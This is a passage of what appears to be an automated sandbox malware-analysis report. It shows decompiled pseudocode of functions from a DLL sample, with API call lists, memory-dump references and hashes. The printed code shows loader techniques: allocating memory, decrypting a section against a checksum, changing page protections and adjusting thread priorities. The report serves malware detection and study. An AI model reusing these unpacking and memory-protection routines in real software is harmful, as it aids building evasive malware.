					L010C82E6();
					_t34 = _t16 + _t13;
					_t18 = E010C2888(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                    0x010c2a51
                    0x010c2a5c
                    0x010c2a5d
                    0x010c2a5d
                    0x010c2a69
                    0x010c2a72
                    0x010c2a75
                    0x010c2a79
                    0x010c2a7b
                    0x010c2a80
                    0x010c2a81
                    0x010c2a82
                    0x010c2a8c
                    0x010c2a8f
                    0x010c2a96
                    0x010c2a9a
                    0x010c2aa1
                    0x010c2aa7
                    0x010c2ab1

                    APIs
                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,010C4610,?,?), ref: 010C2A5D
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,010C4610,?,?), ref: 010C2A69
                    • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 010C2A82
                      • Part of subcall function 010C2888: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 010C28E7
                    • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,010C4610,?,?), ref: 010C2AA1
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                    • String ID:
                    • API String ID: 1610602887-0
                    • Opcode ID: dd18b38331a8cee4c18f3d5423834745f19e5aeb9e7bc7b0bbdce31651779afb
                    • Instruction ID: b7340c68d595801d8ff282aa5dc28973e21f3c81dd0c78ed63467bf56f336cc5
                    • Opcode Fuzzy Hash: dd18b38331a8cee4c18f3d5423834745f19e5aeb9e7bc7b0bbdce31651779afb
                    • Instruction Fuzzy Hash: 7BF0A477A40504BFD7149BA8CC1DFDF76E9DB84755F100124F601E7240E5789A04CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100014B7 Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E100014B7(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E10001077(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                    0x100014c0
                    0x100014c5
                    0x100014d3
                    0x100014d8
                    0x100014d8
                    0x100014de
                    0x100014e3
                    0x100014e7
                    0x100014eb
                    0x100014eb
                    0x100014f5
                    0x100014fe

                    APIs
                    • GetCurrentThread.KERNEL32 ref: 100014BA
                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 100014C5
                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 100014D8
                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 100014EB
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: Thread$Priority$AffinityCurrentMask
                    • String ID:
                    • API String ID: 1452675757-0
                    • Opcode ID: 66a3931e09ca2716b852fa90868ab34a7b4a3eceff202073094630c133cd6c05
                    • Instruction ID: 938d9c3a0a4ff32711df2389b6a8273cc0a2fc41bcb79787c36b196dd8ee152c
                    • Opcode Fuzzy Hash: 66a3931e09ca2716b852fa90868ab34a7b4a3eceff202073094630c133cd6c05
                    • Instruction Fuzzy Hash: 8FE092713062616BF202AB2A4C94EAB779CEF923F17128325F620D22E4CB549C0185A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001508 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 106memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E10001508(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				unsigned int _v24;
				intOrPtr _v28;
				char _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v52;
				signed int _v56;
				intOrPtr _t52;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t70;
				signed int _t79;
				intOrPtr* _t84;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t96;

				_t93 =  *0x100041b0;
				_t52 = E10001B8E(_t93,  &_v32,  &_v24);
				_v28 = _t52;
				if(_t52 == 0) {
					asm("sbb ebx, ebx");
					_t79 =  ~( ~(_v24 & 0x00000fff)) + (_v24 >> 0xc);
					_t94 = _t93 + _v32;
					_v44 = _t94;
					_t59 = VirtualAlloc(0, _t79 << 0xc, 0x3000, 4); // executed
					_v36 = _t59;
					if(_t59 == 0) {
						_v28 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t79 <= 0) {
							_t60 =  *0x100041cc;
						} else {
							_t87 = _a4;
							_v12 = _t94;
							_v12 = _v12 - _t59;
							_t16 = _t87 + 0x100051a7; // 0x100051a7
							_t88 = _t59 - _t94 + _t16;
							_v20 = _t59;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_v16 = 0x400;
								_t96 = 0;
								_t84 = _v20;
								_v40 = (_v56 ^ _v52) - _v8 + _v32 + _a4 - 1;
								do {
									_t70 =  *((intOrPtr*)(_v12 + _t84));
									_t91 = _t70;
									if(_t70 == 0) {
										_v16 = 1;
									} else {
										 *_t84 = _t70 + _t96 - _v40;
										_t96 = _t91;
										_t84 = _t84 + 4;
									}
									_t33 =  &_v16;
									 *_t33 = _v16 - 1;
								} while ( *_t33 != 0);
								_t35 = _t88 + 0xc; // 0x666f736f
								_t36 = _t88 + 8; // 0x7263694d
								_v20 = _v20 + 0x1000;
								_t39 = _t88 + 4; // 0x20303230
								_t60 =  *_t35 -  *_t36 +  *_t39;
								_v8 = _v8 + 1;
								 *0x100041cc = _t60;
							} while (_v8 < _t79);
						}
						if(_t60 != 0x69b25f44) {
							_v28 = 9;
						} else {
							E100020FC(_v24, _v36, _v44);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v28;
			}



























                    0x1000150f
                    0x1000151f
                    0x10001526
                    0x10001529
                    0x1000153e
                    0x10001545
                    0x1000154a
                    0x1000155b
                    0x1000155e
                    0x10001566
                    0x10001569
                    0x1000163b
                    0x1000156f
                    0x1000156f
                    0x10001575
                    0x10001606
                    0x1000157b
                    0x1000157b
                    0x10001582
                    0x10001585
                    0x10001588
                    0x10001588
                    0x1000158f
                    0x10001593
                    0x1000159e
                    0x1000159f
                    0x100015a0
                    0x100015a7
                    0x100015b4
                    0x100015ba
                    0x100015bd
                    0x100015c0
                    0x100015c3
                    0x100015c8
                    0x100015ca
                    0x100015da
                    0x100015cc
                    0x100015d1
                    0x100015d3
                    0x100015d5
                    0x100015d5
                    0x100015e1
                    0x100015e1
                    0x100015e1
                    0x100015e6
                    0x100015e9
                    0x100015ec
                    0x100015f3
                    0x100015f3
                    0x100015f6
                    0x100015fc
                    0x100015fc
                    0x10001603
                    0x10001610
                    0x10001622
                    0x10001612
                    0x1000161b
                    0x1000161b
                    0x10001633
                    0x10001633
                    0x10001642
                    0x10001648

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000030,?,00000000,00000000,?,?,?,?,?,?,?,100010EC), ref: 1000155E
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001633
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID: Dec 15 2021
                    • API String ID: 2087232378-4291124623
                    • Opcode ID: ce9149784ba7d89a87610420d7daca829e393198fb5ef94e6edf65f698c93a8b
                    • Instruction ID: 8b87aa913169fd1d56c1ceb42a763f22b3623cee575485f03a0d7c1fbf3dc598
                    • Opcode Fuzzy Hash: ce9149784ba7d89a87610420d7daca829e393198fb5ef94e6edf65f698c93a8b
                    • Instruction Fuzzy Hash: 1141F871A00219DBEB01CFA8C980BDEB7F8FF08394F154169E905BB244D775AA45CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1000185B Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E1000185B(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x100041cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                    0x10001865
                    0x10001872
                    0x10001878
                    0x10001884
                    0x10001894
                    0x10001896
                    0x1000189e
                    0x10001933
                    0x1000193a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x100018a4
                    0x100018a4
                    0x100018a4
                    0x100018a8
                    0x00000000
                    0x00000000
                    0x100018b4
                    0x100018b8
                    0x100018dc
                    0x100018e0
                    0x100018f4
                    0x100018f4
                    0x100018fa
                    0x10001909
                    0x1000190d
                    0x10001915
                    0x10001915
                    0x1000191d
                    0x10001920
                    0x1000192d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x1000192d
                    0x100018e8
                    0x100018ec
                    0x100018f2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x100018f2
                    0x100018c0
                    0x100018c4
                    0x100018ce
                    0x100018c6
                    0x100018c6
                    0x100018c6
                    0x00000000
                    0x100018c4
                    0x00000000

                    APIs
                    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 10001894
                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001909
                    • GetLastError.KERNEL32 ref: 1000190F
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual$ErrorLast
                    • String ID:
                    • API String ID: 1469625949-0
                    • Opcode ID: b0c5b14f276f5492b38c78d507bfcffce29d468af27afb329b1c58bcc8d062bd
                    • Instruction ID: 0da3d74952dba8c78ee6672b1577cf37ec33a4e7ccf2e9bbd94a8fa2aae774cc
                    • Opcode Fuzzy Hash: b0c5b14f276f5492b38c78d507bfcffce29d468af27afb329b1c58bcc8d062bd
                    • Instruction Fuzzy Hash: 3F215C7180030ADFEB14CF85C885AEAF7F8FF48395F01846AD606D7118E7B4AA65CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C3B61 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                    Download Yara Rule
                    C-Code - Quality: 47%
                    			E010C3B61(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E010C63FD(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x10c9284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                    0x010c3b65
                    0x010c3b72
                    0x010c3b74
                    0x010c3b75
                    0x010c3b7d
                    0x010c3b7d
                    0x010c3b81
                    0x00000000
                    0x00000000
                    0x010c3b78
                    0x010c3b79
                    0x010c3b7c
                    0x010c3b7c
                    0x010c3b89
                    0x010c3b90
                    0x010c3b93
                    0x010c3b9b
                    0x010c3ba1
                    0x010c3ba3
                    0x010c3ba6
                    0x010c3baa
                    0x010c3bac
                    0x010c3baf
                    0x010c3baf
                    0x010c3bb0
                    0x010c3bb2
                    0x010c3baf
                    0x010c3bbc
                    0x010c3bbf
                    0x010c3bc2
                    0x010c3bc5
                    0x010c3bc5
                    0x010c3bcc
                    0x010c3bcc
                    0x010c3bd8

                    APIs
                    • StrChrA.SHLWAPI(?,00000020,00000000,037A95AC,?,?,010C104B,?,037A95AC), ref: 010C3B7D
                    • StrTrimA.SHLWAPI(?,010C9284,00000002,?,010C104B,?,037A95AC), ref: 010C3B9B
                    • StrChrA.SHLWAPI(?,00000020,?,010C104B,?,037A95AC), ref: 010C3BA6
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Trim
                    • String ID:
                    • API String ID: 3043112668-0
                    • Opcode ID: 7eb3ed976943121f3154f54e55ab520d5ab355d3de76cde15a1b61cf68314163
                    • Instruction ID: e8a4f2c62c3e82b18011071b2f1630a3356be71b1d66a78d4f983967cc925ceb
                    • Opcode Fuzzy Hash: 7eb3ed976943121f3154f54e55ab520d5ab355d3de76cde15a1b61cf68314163
                    • Instruction Fuzzy Hash: 4B014C713102456EE7605B2ACC49F5A7BDDEBC9A94F048059ABC5CF282D570D8428A60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C607D Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C607D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E010C63FD(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x10ca374, 0x110);
					_t27 =  *0x10ca378; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E010C43A6(0x110, _a4, _t27, 0);
					}
					if(E010C5B65( &_v36) != 0) {
						_t35 = E010C4872(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_v16 = E010C6412(_t55, _a8, _t51, _t46, _a12);
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0xbf0845c7
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E010C17AB(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E010C17AB(_a4);
				}
				return _v16;
			}















                    0x010c6083
                    0x010c6088
                    0x010c6095
                    0x010c6098
                    0x010c609b
                    0x010c60a2
                    0x010c60a5
                    0x010c60b3
                    0x010c60b8
                    0x010c60bd
                    0x010c60c2
                    0x010c60c4
                    0x010c60cc
                    0x010c60cc
                    0x010c60db
                    0x010c60f0
                    0x010c60f7
                    0x010c60fe
                    0x010c6104
                    0x010c6112
                    0x010c6118
                    0x010c611b
                    0x010c6128
                    0x010c612d
                    0x010c6131
                    0x010c6131
                    0x010c60f7
                    0x010c613c
                    0x010c6147
                    0x010c6147
                    0x010c6153

                    APIs
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • memcpy.NTDLL(00000000,00000110,?,?,?,?,010C4DD9,?,010C3AC6,010C3AC6,?), ref: 010C60B3
                    • memset.NTDLL ref: 010C6128
                    • memset.NTDLL ref: 010C613C
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memset$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 1529149438-0
                    • Opcode ID: 36818a1076aa2f98746704bbdb15f83971cc28bfd9bad8702f44a39611df7f42
                    • Instruction ID: edeb7d4b633c8e72529081f401d6769b2263985f7c541ed1d8f35e1c4bea7aa0
                    • Opcode Fuzzy Hash: 36818a1076aa2f98746704bbdb15f83971cc28bfd9bad8702f44a39611df7f42
                    • Instruction Fuzzy Hash: F0217175A00119ABDB11EF65CC40FEE7BB8AF58A40F044069FD44E7241E735D6018FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C5F80 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E010C5F80(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E010C14E4(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x10ca320; // 0x26dd5a8
						_t20 = _t68 + 0x10cb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E010C63B0(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                    0x010c5f86
                    0x010c5f89
                    0x010c5f99
                    0x010c5fa2
                    0x010c5fa6
                    0x010c6074
                    0x010c607a
                    0x010c607a
                    0x010c5fc0
                    0x010c5fc5
                    0x010c5fc9
                    0x010c5fcf
                    0x010c5fd4
                    0x010c5fdb
                    0x010c5fea
                    0x010c5fea
                    0x010c5fee
                    0x010c5ff0
                    0x010c5ffc
                    0x010c6007
                    0x010c6012
                    0x010c6016
                    0x010c6020
                    0x010c6024
                    0x010c6026
                    0x010c602b
                    0x010c6032
                    0x010c6042
                    0x010c6042
                    0x010c602b
                    0x010c6024
                    0x010c6044
                    0x010c6049
                    0x010c604e
                    0x010c604e
                    0x010c6054
                    0x010c605a
                    0x010c605f
                    0x010c605f
                    0x010c6064
                    0x010c6069
                    0x010c6069
                    0x010c6064
                    0x010c5fee
                    0x010c606b
                    0x010c6071
                    0x00000000

                    APIs
                      • Part of subcall function 010C14E4: SysAllocString.OLEAUT32(80000002), ref: 010C153B
                      • Part of subcall function 010C14E4: SysFreeString.OLEAUT32(00000000), ref: 010C15A0
                    • SysFreeString.OLEAUT32(?), ref: 010C605F
                    • SysFreeString.OLEAUT32(010C2BCC), ref: 010C6069
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    • Opcode ID: 717154f6000c2fdbaf363a53cad0144a7e4469bec6633a33d1fdb66b69179409
                    • Instruction ID: f68f6298674456358ae6019b919d083959519d24db5b9c35b3b10ea17d41b7a1
                    • Opcode Fuzzy Hash: 717154f6000c2fdbaf363a53cad0144a7e4469bec6633a33d1fdb66b69179409
                    • Instruction Fuzzy Hash: D8310872500159EFCB21DF58C888CAFBBB9FF89B407244698FA459B211D732ED51CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001EA8 Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E10001EA8() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t16;
				void* _t17;
				long _t26;
				int _t27;
				void* _t31;
				intOrPtr* _t33;
				signed int _t37;
				intOrPtr _t39;

				_t16 =  *0x100041d0;
				if( *0x100041ac > 5) {
					_t17 = _t16 + 0x100050f9;
				} else {
					_t17 = _t16 + 0x100050b1;
				}
				E10001A10(_t17, _t17);
				_t37 = 6;
				memset( &_v32, 0, _t37 << 2);
				if(E10001733( &_v32,  &_v16,  *0x100041cc ^ 0xf7a71548) == 0) {
					_t26 = 0xb;
				} else {
					_t27 = lstrlenW( *0x100041b8);
					_t8 = _t27 + 2; // 0x2
					_t11 = _t27 + _t8 + 8; // 0xa
					_t31 = E10001DCF(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t31 == 0) {
						_t40 =  *0x100041b8;
						_t33 = _v36;
						 *_t33 = 0;
						if( *0x100041b8 == 0) {
							 *(_t33 + 4) =  *(_t33 + 4) & 0x00000000;
						} else {
							E100020FC(_t45, _t40, _t33 + 4);
						}
					}
					_t26 = E100011CA(_v28); // executed
				}
				ExitThread(_t26);
			}















                    0x10001eae
                    0x10001ebf
                    0x10001ec9
                    0x10001ec1
                    0x10001ec1
                    0x10001ec1
                    0x10001ed0
                    0x10001ed9
                    0x10001ede
                    0x10001efc
                    0x10001f58
                    0x10001efe
                    0x10001f04
                    0x10001f0a
                    0x10001f18
                    0x10001f1c
                    0x10001f23
                    0x10001f25
                    0x10001f2d
                    0x10001f31
                    0x10001f37
                    0x10001f46
                    0x10001f39
                    0x10001f3f
                    0x10001f3f
                    0x10001f37
                    0x10001f4f
                    0x10001f4f
                    0x10001f5a

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ExitThreadlstrlen
                    • String ID:
                    • API String ID: 2636182767-0
                    • Opcode ID: ad6c6029e475f8ec852d0dbf32e872dca2d5c9b741e1b9efc5396741c870abaf
                    • Instruction ID: bd2b8457e7f43d2138ce0c24819570377c37de41f18c9477cad12fa20dcd2f1c
                    • Opcode Fuzzy Hash: ad6c6029e475f8ec852d0dbf32e872dca2d5c9b741e1b9efc5396741c870abaf
                    • Instruction Fuzzy Hash: 2211BFB2904206ABF711DF64CC89EDB77EDEB043C0F024826FA04D3069EB30E9488B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C2985 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C2985(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E010C1BC5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x10ca2d8, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E010C3CEA(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                    0x010c2985
                    0x010c298d
                    0x010c29a4
                    0x010c29bf
                    0x010c29c3
                    0x010c29c8
                    0x010c29ca
                    0x010c29da
                    0x010c29e6
                    0x010c29cc
                    0x010c29cc
                    0x010c29cf
                    0x010c29d4
                    0x010c29d4
                    0x010c29ca
                    0x010c29ec
                    0x010c29f0
                    0x010c29f0
                    0x010c2999
                    0x010c299e
                    0x010c29a2
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                      • Part of subcall function 010C3CEA: SysFreeString.OLEAUT32(00000000), ref: 010C3D50
                    • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,010C33D6,?,004F0053,037A93D8,00000000,?), ref: 010C29E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
